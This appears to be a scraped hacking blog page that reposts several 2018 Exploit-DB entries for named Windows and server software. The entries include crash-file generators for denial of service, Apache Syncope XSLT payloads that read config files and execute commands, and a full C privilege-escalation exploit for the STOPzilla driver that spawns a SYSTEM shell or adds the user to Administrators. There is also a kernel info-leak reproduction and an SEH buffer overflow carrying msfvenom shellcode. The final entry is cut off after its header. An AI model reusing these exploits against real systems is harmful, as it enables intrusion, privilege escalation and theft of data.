# Exploit Title: MediaTek Wirless Utility rt2870 - Denial of Service (PoC)
# Autor: Lawrence Amer
# Date: 2018-09-13
# Vendor: MediaTek
# Software url: https://click.pstmrk.it/2ts/d86o2zu8ugzlg.cloudfront.net%2Fmediatek-craft%2Fdrivers%2FRT2770_2870_RT307x.zip/K94pHAI/oTs1/oC6CdN114w
# Tested on OS: Windows 7 64-bit , 32-bit
# Description: launch program then click on Add profile setting dialog choose our generate prof file ,
# succesfully reproduce persistent Denial of service every time launch the program again .
#!/usr/bin/python
buffer ="\x41"*3000
start = "["
end = "]"
payload = start+buffer+end
try:
f=open("poc.prof","w")
print "[+] Creating %s Byet evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] file created !"
except:
print "File cannot be created !"
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863580644
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Apache Syncope 2.0.7 - Remote Code Execution
# Date: 2018-09-12
# Exploit Author: Che-Chun Kuo
# Vendor Homepage: https://syncope.apache.org/
# Software Link: http://archive.apache.org/dist/syncope/
# Version: 2.0.7
# Tested on: Windows
# Advisory: https://syncope.apache.org/security
# CVE: CVE-2018-1321, CVE-2018-1322
# Vulnerability 1: Remote code execution by users with report and template privileges
# Description: A user with access to the Reports and Templates functionality can use XSL Transformations (XSLT)
# to perform malicious operations, including but not limited to file read, file write, and code execution.
# Apache Syncope uses XSLT to export report data into various formats. An attacker can perform malicious
# operations by crafting a XSL template, binding the template to a report, executing, then exporting the report.
# The following XSL can be used to read the Syncope security.properties file or execute the Windows
# calc program, respectively.
READ security.properties file
-------------------------------------------
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xsl:stylesheet [<!ENTITY file SYSTEM "..\webapps\syncope\WEB-INF\classes\security.properties">]>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">&file;</xsl:template>
</xsl:stylesheet>
EXECUTE Windows calc program
-------------------------------------------
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:runtime="http://xml.apache.org/xalan/java/java.lang.Runtime"
xmlns:process="http://xml.apache.org/xalan/java/java.lang.Process">
<xsl:variable name="rtobject" select="runtime:getRuntime()"/>
<xsl:variable name="process" select="runtime:exec($rtobject,'calc')"/>
<xsl:variable name="waiting" select="process:waitFor($process)"/>
<xsl:value-of select="$process"/>
</xsl:stylesheet>
# Vulnerability 2: Information disclosure via FIQL and ORDER BY sorting
# Description: A user with entitlements to the /syncope/rest/users endpoint can recover sensitive
# security values using the fiql and orderby parameters.
# By default, Apache Syncope prevents sensitive values from being returned when querying
# the /syncope/rest/users endpoint. Fields such as securityAnswers or password will always return null.
# However the results returned can be filtered or sorted based on sensitive fields. By measuring how
# the results are returned the values of the desired fields can be successfully recovered. The fiql parameter
# can be used to recover full security answers, and the orderby parameter can be used to recover
# full security answers and partial information about password hashes.
# The fiql parameter allows filtering based on user attributes, including a user's security answer.
# By using FIQL filters (i.e. "securityAnswer==a*", "securityAnswer==b*", etc...) a user's
# securityAnswer can be recovered one letter at a time.
# The orderby parameter allows sorting based on user attributes, including a user's security
# answer and password. The following example shows how orderby sorting can be exploited.
# User Bob exists with the security answer "test". A malicious user creates a user Alice with the
# security answer "ta". The malicious actor then calls the /syncope/rest/users endpoint with orderby=securityAnswer".
# By sorting using the "securityAnswer" attribute, the result will have Alice sorted ahead of Bob,
# due to the value "ta" being before the value "test". By sequentially changing Alice's security
# question and comparing the sorted result, Bob's security answer can be recovered one letter
# at a time. A similar technique can be used to reveal partial information about user password hashes.
Orderby Example Results:
Alice's security answer, Order of results returned
ta, [Alice, Bob]
tb, [Alice, Bob]
tc, [Alice, Bob]
td, [Alice, Bob]
te, [Alice, Bob]
tf, [Bob, Alice]
tea, [Alice, Bob]
teb, [Alice, Bob]
# Exploit Title: Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)
# Exploit Author: ZwX
# Exploit Date: 2018-09-11
# Vendor Homepage : http://www.clone2go.com/
# Software Link: http://www.clone2go.com/down/video-to-ipod-setup.exe
# Tested on OS: Windows 7
# Proof of Concept (PoC):
# The local buffer overflow vulnerability can be exploited by local attackers with
# restricted system user account without user interaction. For security demonstration
# or to reproduce follow the provided information and steps below to continue.
# Manual steps to reproduce the vulnerability ...
# 1 Install the software and start the client
# 2 Copy the AAAA...string from bof.txt to clipboard
# 3 Run VideoConverter.exex
# 4 Go Menu Menu > Edit > Options > Set Output folder (Input)
# 5 Paste it the input AAAA....string and click Open
# 6 A messagebox opens click ok
# 7 Software will stable crash or shut down
# 8 Successful reproduce of the Denial of Service
#!/usr/bin/python
buffer = "\x41" * 430
poc = buffer
file = open("poc.txt","w")
file.write(poc)
file.close()
print "POC Created by ZwX"
/*
# Exploit Title: STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation
# Date: 2018-09-13
# Author: Parvez Anwar (@parvezghh)
# Vendor Homepage: https://www.stopzilla.com/
# Software link: https://download.stopzilla.com/binaries/stopzilla/auto_installer/STOPzillaAntiMalware.msi
# Tested Version: 6.5.2.59
# Driver Version: 3.0.23.0 - szkg64.sys
# Tested on OS: 64bit Windows 7 and Windows 10 (1803)
# CVE ID: N/A
# Vendor fix url - No response from vendor
# Fixed Version - 0day
# Fixed driver ver - 0day
# https://www.greyhathacker.net/?p=1025
*/
#include <stdio.h>
#include <windows.h>
#include <winternl.h>
#include <sddl.h>
#pragma comment(lib,"winsta.lib")
#pragma comment(lib,"advapi32.lib")
#define SystemHandleInformation 16
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
void WINAPI WinStationSwitchToServicesSession();
typedef unsigned __int64 QWORD;
typedef struct _SID_BUILTIN
{
UCHAR Revision;
UCHAR SubAuthorityCount;
SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
ULONG SubAuthority[2];
} SID_BUILTIN, *PSID_BUILTIN;
typedef struct _SID_INTEGRITY
{
UCHAR Revision;
UCHAR SubAuthorityCount;
SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
ULONG SubAuthority[1];
} SID_INTEGRITY, *PSID_INTEGRITY;
typedef NTSYSAPI NTSTATUS (NTAPI *_ZwCreateToken)(
OUT PHANDLE TokenHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN TOKEN_TYPE Type,
IN PLUID AuthenticationId,
IN PLARGE_INTEGER ExpirationTime,
IN PTOKEN_USER User,
IN PTOKEN_GROUPS Groups,
IN PTOKEN_PRIVILEGES Privileges,
IN PTOKEN_OWNER Owner,
IN PTOKEN_PRIMARY_GROUP PrimaryGroup,
IN PTOKEN_DEFAULT_DACL DefaultDacl,
IN PTOKEN_SOURCE Source
);
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
QWORD Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
int GetWindowsVersion()
{
int ver = 0;
OSVERSIONINFO osvi;
ZeroMemory(&osvi, sizeof(OSVERSIONINFO));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi);
if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 1) ver = 1; // Windows 7
if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 2) ver = 2; // Windows 10
return ver;
}
int spawnShell(HANDLE hTokenElevated)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(STARTUPINFO));
ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
si.cb = sizeof(STARTUPINFO);
si.lpDesktop = "WinSta0\\Default";
if (!CreateProcessAsUser(hTokenElevated, NULL, "C:\\Windows\\System32\\cmd.exe", NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] Failed to execute command (%d) Run exploit again\n\n", GetLastError());
return -1;
}
printf("\n[+] Executed command successfully");
printf("\n[*] Switching session . . .\n\n");
WinStationSwitchToServicesSession();
return 0;
}
int AddAccountToAdminGroup(HANDLE hTokenElevated)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
DWORD currentusersize;
char currentuser[100];
char netcommand[MAX_PATH];
ZeroMemory(&si, sizeof(STARTUPINFO));
ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
si.cb = sizeof(STARTUPINFO);
currentusersize = sizeof(currentuser);
if (!GetUserName(currentuser, ¤tusersize))
{
printf("\n[-] Failed to obtain current username: %d\n\n", GetLastError());
return -1;
}
printf("\n[*] Adding current user '%s' account to the local administrators group", currentuser);
sprintf(netcommand, "net localgroup Administrators %s /add", currentuser);
if (!CreateProcessAsUser(hTokenElevated, NULL, netcommand, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] Failed to execute command (%d) Run exploit again\n\n", GetLastError());
return -1;
}
printf("\n[+] Executed command successfully\n");
return 0;
}
PTOKEN_PRIVILEGES SetPrivileges()
{
PTOKEN_PRIVILEGES privileges;
LUID luid;
int NumOfPrivileges = 5;
int nBufferSize;
nBufferSize = sizeof(TOKEN_PRIVILEGES) + sizeof(LUID_AND_ATTRIBUTES) * NumOfPrivileges;
privileges = (PTOKEN_PRIVILEGES) LocalAlloc(LPTR, nBufferSize);
privileges->PrivilegeCount = NumOfPrivileges;
LookupPrivilegeValue(NULL, SE_TCB_NAME, &luid);
privileges->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[0].Luid = luid;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid);
privileges->Privileges[1].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[1].Luid = luid;
LookupPrivilegeValue(NULL, SE_ASSIGNPRIMARYTOKEN_NAME, &luid);
privileges->Privileges[2].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[2].Luid = luid;
LookupPrivilegeValue(NULL, SE_TAKE_OWNERSHIP_NAME, &luid);
privileges->Privileges[3].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[3].Luid = luid;
LookupPrivilegeValue(NULL, SE_IMPERSONATE_NAME, &luid);
privileges->Privileges[4].Attributes = SE_PRIVILEGE_ENABLED;
privileges->Privileges[4].Luid = luid;
return privileges;
}
PSID GetLocalSystemSID()
{
PSID psid = NULL;
SID_IDENTIFIER_AUTHORITY sidAuth = SECURITY_NT_AUTHORITY;
if (AllocateAndInitializeSid(&sidAuth, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &psid) == FALSE)
{
printf("\n[-] AllocateAndInitializeSid failed %d\n", GetLastError());
return NULL;
}
return psid;
}
LPVOID GetInfoFromToken(HANDLE hToken, TOKEN_INFORMATION_CLASS type)
{
DWORD dwLengthNeeded;
LPVOID lpData = NULL;
if (!GetTokenInformation(hToken, type, NULL, 0, &dwLengthNeeded) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
{
printf("\n[-] Failed to initialize GetTokenInformation %d", GetLastError());
return NULL;
}
lpData = (LPVOID)LocalAlloc(LPTR, dwLengthNeeded);
GetTokenInformation(hToken, type, lpData, dwLengthNeeded, &dwLengthNeeded);
return lpData;
}
QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID)
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_HANDLE_INFORMATION pSysHandleInfo;
ULONG i;
PSYSTEM_HANDLE pHandle;
QWORD TokenAddress = 0;
DWORD nSize = 4096;
DWORD nReturn;
BOOL tProcess;
HANDLE hToken;
if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE)
{
printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError());
return -1;
}
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
do
{
nSize += 4096;
pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize);
} while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH);
printf("\n[i] Current process id %d and token handle value %u", MyProcessID, hToken);
for (i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
{
if (pSysHandleInfo->Handles[i].ProcessId == MyProcessID && pSysHandleInfo->Handles[i].Handle == hToken)
{
TokenAddress = pSysHandleInfo->Handles[i].Object;
}
}
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
return TokenAddress;
}
HANDLE CreateUserToken(HANDLE hToken)
{
_ZwCreateToken ZwCreateToken;
HANDLE hTokenElevated;
NTSTATUS status;
int i;
DWORD dwSize = 0;
TOKEN_USER userToken;
PTOKEN_PRIVILEGES privileges = NULL;
PTOKEN_OWNER ownerToken = NULL;
PTOKEN_GROUPS groups = NULL;
PTOKEN_PRIMARY_GROUP primary_group = NULL;
PTOKEN_DEFAULT_DACL default_dacl = NULL;
PLUID pluidAuth;
LARGE_INTEGER li;
PLARGE_INTEGER pli;
LUID authid = SYSTEM_LUID;
LUID luid;
PSID_AND_ATTRIBUTES pSid;
SID_BUILTIN TkSidLocalAdminGroup = { 1, 2, { 0, 0, 0, 0, 0, 5 }, { 32, DOMAIN_ALIAS_RID_ADMINS } };
SECURITY_QUALITY_OF_SERVICE sqos = { sizeof(sqos), SecurityImpersonation, SECURITY_STATIC_TRACKING, FALSE };
OBJECT_ATTRIBUTES oa = { sizeof(oa), 0, 0, 0, 0, &sqos };
TOKEN_SOURCE SourceToken = { { '!', '!', '!', '!', '!', '!', '!', '!' }, { 0, 0 } };
SID_IDENTIFIER_AUTHORITY nt = SECURITY_NT_AUTHORITY;
PSID lpSidOwner = NULL;
SID_INTEGRITY IntegritySIDSystem = { 1, 1, SECURITY_MANDATORY_LABEL_AUTHORITY, SECURITY_MANDATORY_SYSTEM_RID };
ZwCreateToken = (_ZwCreateToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "ZwCreateToken");
if (ZwCreateToken == NULL)
{
printf("[-] Unable to resolve ZwCreateToken: %d\n\n", GetLastError());
return NULL;
}
groups = (PTOKEN_GROUPS)GetInfoFromToken(hToken, TokenGroups);
primary_group = (PTOKEN_PRIMARY_GROUP)GetInfoFromToken(hToken, TokenPrimaryGroup);
default_dacl = (PTOKEN_DEFAULT_DACL)GetInfoFromToken(hToken, TokenDefaultDacl);
pSid = groups->Groups;
for (i=0; i<groups->GroupCount; i++, pSid++)
{
PISID piSid = (PISID)pSid->Sid;
if (pSid->Attributes & SE_GROUP_INTEGRITY)
{
memcpy(pSid->Sid, &IntegritySIDSystem, sizeof(IntegritySIDSystem));
}
if (piSid->SubAuthority[piSid->SubAuthorityCount - 1] == DOMAIN_ALIAS_RID_USERS)
{
memcpy(piSid, &TkSidLocalAdminGroup, sizeof(TkSidLocalAdminGroup)); // Found RID_USERS membership, overwrite with RID_ADMINS
pSid->Attributes = SE_GROUP_ENABLED;
}
else
{
pSid->Attributes &= ~SE_GROUP_USE_FOR_DENY_ONLY;
pSid->Attributes &= ~SE_GROUP_ENABLED;
}
}
pluidAuth = &authid;
li.LowPart = 0xFFFFFFFF;
li.HighPart = 0xFFFFFFFF;
pli = &li;
AllocateAndInitializeSid(&nt, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &lpSidOwner);
userToken.User.Sid = lpSidOwner;
userToken.User.Attributes = 0;
AllocateLocallyUniqueId(&luid);
SourceToken.SourceIdentifier.LowPart = luid.LowPart;
SourceToken.SourceIdentifier.HighPart = luid.HighPart;
ownerToken = (PTOKEN_OWNER) LocalAlloc(LPTR, sizeof(PSID));
ownerToken->Owner = GetLocalSystemSID();
privileges = SetPrivileges();
status = ZwCreateToken(&hTokenElevated,
TOKEN_ALL_ACCESS,
&oa,
TokenPrimary,
pluidAuth,
pli,
&userToken,
groups,
privileges,
ownerToken,
primary_group,
default_dacl,
&SourceToken);
if (status == STATUS_SUCCESS)
{
printf("\n[+] New token created successfully\n");
return hTokenElevated;
}
else
{
// printf("\n[-] Failed to create new token %08x\n", status);
return NULL;
}
if (lpSidOwner) FreeSid(lpSidOwner);
if (groups) LocalFree(groups);
if (privileges) LocalFree(privileges);
if (primary_group) LocalFree(primary_group);
if (default_dacl) LocalFree(default_dacl);
if (ownerToken) { if(ownerToken->Owner) FreeSid(ownerToken->Owner); LocalFree(ownerToken); }
return NULL;
}
int main(int argc, char *argv[])
{
QWORD TokenAddressTarget;
QWORD SepPrivilegesOffset = 0x40;
QWORD PresentByteOffset;
QWORD EnableByteOffset;
QWORD TokenAddress;
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
HANDLE hTokenCurrent;
HANDLE hTokenElevate;
printf("-------------------------------------------------------------------------------\n");
printf(" STOPzilla AntiMalware (szkg64.sys) Arbitrary Write EoP Exploit \n");
printf(" Tested on 64bit Windows 7 / Windows 10 (1803) \n");
printf("-------------------------------------------------------------------------------\n");
TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
printf("\n[i] Address of current process token 0x%p", TokenAddress);
TokenAddressTarget = TokenAddress + SepPrivilegesOffset;
printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten\n", TokenAddressTarget);
PresentByteOffset = TokenAddressTarget + 0x0;
printf("[i] Present bits at 0x%p will be overwritten\n", PresentByteOffset);
EnableByteOffset = TokenAddressTarget + 0x8;
printf("[i] Enabled bits at 0x%p will be overwritten", EnableByteOffset);
sprintf(devhandle, "\\\\.\\%s", "msprocess");
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Open %s device failed\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
printf("\n[~] Press any key to continue . . .\n");
getch();
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hTokenCurrent))
{
printf("[-] Failed OpenProcessToken() %d\n\n", GetLastError());
return NULL;
}
printf("[+] OpenProcessToken() handle opened successfully");
do
{
printf("\n[*] Overwriting _SEP_TOKEN_PRIVILEGES bits");
DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)PresentByteOffset, 0, &dwRetBytes, NULL);
DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)EnableByteOffset, 0, &dwRetBytes, NULL);
hTokenElevate = CreateUserToken(hTokenCurrent);
Sleep(500);
} while (hTokenElevate == NULL);
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows 7");
printf("\n[*] Spawning SYSTEM Shell");
spawnShell(hTokenElevate);
}
if (GetWindowsVersion() == 2)
{
printf("[i] Running Windows 10");
AddAccountToAdminGroup(hTokenElevate);
}
else if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not tested on this OS\n\n");
}
CloseHandle(hDevice);
return 0;
}
# Exploit Title: TeamViewer App 13.0.100.0 - Denial of Service (PoC)
# Exploit Author: Ali Alipour
# WebSite: http://Alipour.it
# Date: 2018-09-13
# Vendor Homepage: https://www.teamviewer.com
# Software Link Download:https://www.microsoft.com/en-us/p/teamviewer-remote-control/9wzdncrfj0rh?activetab=pivot%3aoverviewtab
# Tested on: Windows 10 - 64-bit
# Steps to Reproduce
# Run the python exploit script, it will create a new
# file with the name "TeamViewer.txt" just copy the text inside "TeamViewer.txt"
# and start the TeamViewer App 13.0.100.0 - In Microsoft Windows 10 .
# In The New Window Click On " Login " And Paste "Test@Test.Com" into Email Address Filed .
# Now Paste The Content Of "TeamViewer.txt" Into The Field: " Password ".
# Click "Sign in" And You Will See a [ Boom !!!! ] - TeamViewer App 13.0.100.0 - In Microsoft Windows 10 Crash.
#!/usr/bin/python
buffer = "A" * 9000
payload = buffer
try:
f=open("TeamViewer.txt",22"w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
There is a missing address check in both show_opcodes() callers.
show_opcodes() is mostly used by the kernel to print the raw
instruction bytes surrounding an instruction that generated an
unexpected exception; however, sometimes it is also used to
print userspace instructions.
Because the userspace address isn't checked against TASK_SIZE_MAX, if userspace
faults on a kernel address, the kernel can dump data from a user-controlled
address into dmesg.
show_opcodes() has two callers:
- since commit ba54d856a9d8 (first in 4.18): show_signal_msg() shows userspace
instructions when userspace e.g. segfaults
- show_ip() is used when the kernel detects some sort of bug; this means that
to trigger it, you need some way to at least trigger a WARN() or so
Repro for the first variant:
=========================
user@debian:~/segfault$ sudo grep core_pattern /proc/kallsyms
ffffffff9ae34180 D core_pattern
ffffffff9be99500 t _GLOBAL__sub_I_65535_1_core_pattern
ffffffff9bff2860 t _GLOBAL__sub_D_65535_0_core_pattern
user@debian:~/segfault$ cat segfault.c
int main(void) {
void (*fn)(void) = (void*)0xffffffff9ae34180;
fn();
}
user@debian:~/segfault$ gcc -o segfault segfault.c
user@debian:~/segfault$ ./segfault
Segmentation fault
user@debian:~/segfault$ sudo dmesg | tail -n2
[19511.957855] segfault[2622]: segfault at ffffffff9ae34180 ip ffffffff9ae34180 sp 00007ffe0adf1568 error 15
[19511.962055] Code: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <63> 6f 72 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=========================
Note the "<63> 6f 72 65 00" - that's "core\0".
Repro for the second variant:
Patch the kernel like this to get an easy way to trigger a WARN() in the right
context:
=========================
diff --git a/arch/x86/mm/fault.c b/arch/x86/mm/fault.c
index b9123c497e0a..fab40edd4c9e 100644
--- a/arch/x86/mm/fault.c
+++ b/arch/x86/mm/fault.c
@@ -891,6 +891,7 @@ __bad_area_nosemaphore(struct pt_regs *regs, unsigned long error_code,
tsk->thread.trap_nr = X86_TRAP_PF;
force_sig_info_fault(SIGSEGV, si_code, address, tsk, pkey, 0);
+ WARN(1, "TESTING WARN()");
return;
}
=========================
Then run the same repro code as before (with the core_pattern address fixed up).
Result:
=========================
[ 125.564041] segfault[1602]: segfault at ffffffff854340c0 ip ffffffff854340c0 sp 00007ffd4cc7a568 error 15
[ 125.569923] Code: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <63> 6f 72 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 125.576859] ------------[ cut here ]------------
[ 125.578406] TESTING WARN()
[ 125.578439] WARNING: CPU: 6 PID: 1602 at arch/x86/mm/fault.c:894 __bad_area_nosemaphore+0x147/0x270
[ 125.582172] Modules linked in: bpfilter
[ 125.583394] CPU: 6 PID: 1602 Comm: segfault Tainted: G W 4.18.0+ #108
[ 125.585811] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
[ 125.588410] RIP: 0010:__bad_area_nosemaphore+0x147/0x270
[ 125.590078] Code: 48 89 d9 48 89 ea 44 89 e6 48 c7 83 30 0b 00 00 0e 00 00 00 bf 0b 00 00 00 e8 f5 eb ff ff 48 c7 c7 00 61 66 84 e8 79 11 05 00 <0f> 0b 48 83 c4 28 5b 5d 41 5c 41 5d 41 5e 41 5f c3 48 83 c4 28 4c
[ 125.595779] RSP: 0018:ffff8801cb3b7e18 EFLAGS: 00010286
[ 125.597426] RAX: 0000000000000000 RBX: ffff8801cbb9e000 RCX: 0000000000000000
[ 125.599605] RDX: 0000000000000001 RSI: dffffc0000000000 RDI: ffffffff86678ea0
[ 125.601800] RBP: ffffffff854340c0 R08: ffffed003d873ed5 R09: ffffed003d873ed5
[ 125.603935] R10: 0000000000000001 R11: ffffed003d873ed4 R12: 0000000000000001
[ 125.606113] R13: 0000000000000000 R14: 0000000000000015 R15: ffff8801cb3b7f58
[ 125.608250] FS: 00007fe30d518700(0000) GS:ffff8801ec380000(0000) knlGS:0000000000000000
[ 125.610608] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 125.612331] CR2: ffffffff854340c0 CR3: 00000001d563e001 CR4: 00000000003606e0
[ 125.614470] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 125.616607] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 125.618736] Call Trace:
[ 125.619475] __do_page_fault+0x133/0x780
[ 125.620646] ? mm_fault_error+0x1b0/0x1b0
[ 125.622236] ? async_page_fault+0x8/0x30
[ 125.623388] async_page_fault+0x1e/0x30
[ 125.624526] RIP: 0033:core_pattern+0x0/0x880
[ 125.625786] Code: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <63> 6f 72 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 125.631208] RSP: 002b:00007ffd4cc7a568 EFLAGS: 00010202
[ 125.632737] RAX: ffffffff854340c0 RBX: 0000000000000000 RCX: 0000000000000000
[ 125.635039] RDX: 00007ffd4cc7a678 RSI: 00007ffd4cc7a668 RDI: 0000000000000001
[ 125.637088] RBP: 00007ffd4cc7a580 R08: 0000562d395106f0 R09: 00007fe30d323cb0
[ 125.639153] R10: 0000000000000000 R11: 00007fe30d0d23c0 R12: 0000562d39510530
[ 125.641183] R13: 00007ffd4cc7a660 R14: 0000000000000000 R15: 0000000000000000
[ 125.643221] ---[ end trace fb20716f9d6369bd ]---
=========================
# Exploit Title: Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-13
# Software Link: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
# Tested on OS: Windows 7 32bit
# Tested Version: 2.6
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name "exploit.mp3".
# Start the program and click on "Convert".
# Find the file "exploit.mp3" and click "Open"
# You will see a calculator poped up.
#!/usr/bin/python
buffer = "A" * 4116
NSEH = "\xeb\x06\x90\x90"
SEH = "\x21\x21\xe4\x66"
nops = "\x90" * 8
#badchar \x00\x0a\x0d\x2f
#msfvenom calculator
buf = ""
buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
pad = "B" * (4440 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )
payload = buffer + NSEH + SEH + nops + buf + pad
try:
f=open("exploit.mp3","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: Faleemi Desktop Software 1.8.2 - 'SavePath for ScreenShots' Buffer Overflow (SEH)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-13
# Software Link: http://support.faleemi.com/fsc776/Faleemi_v1.8.exe
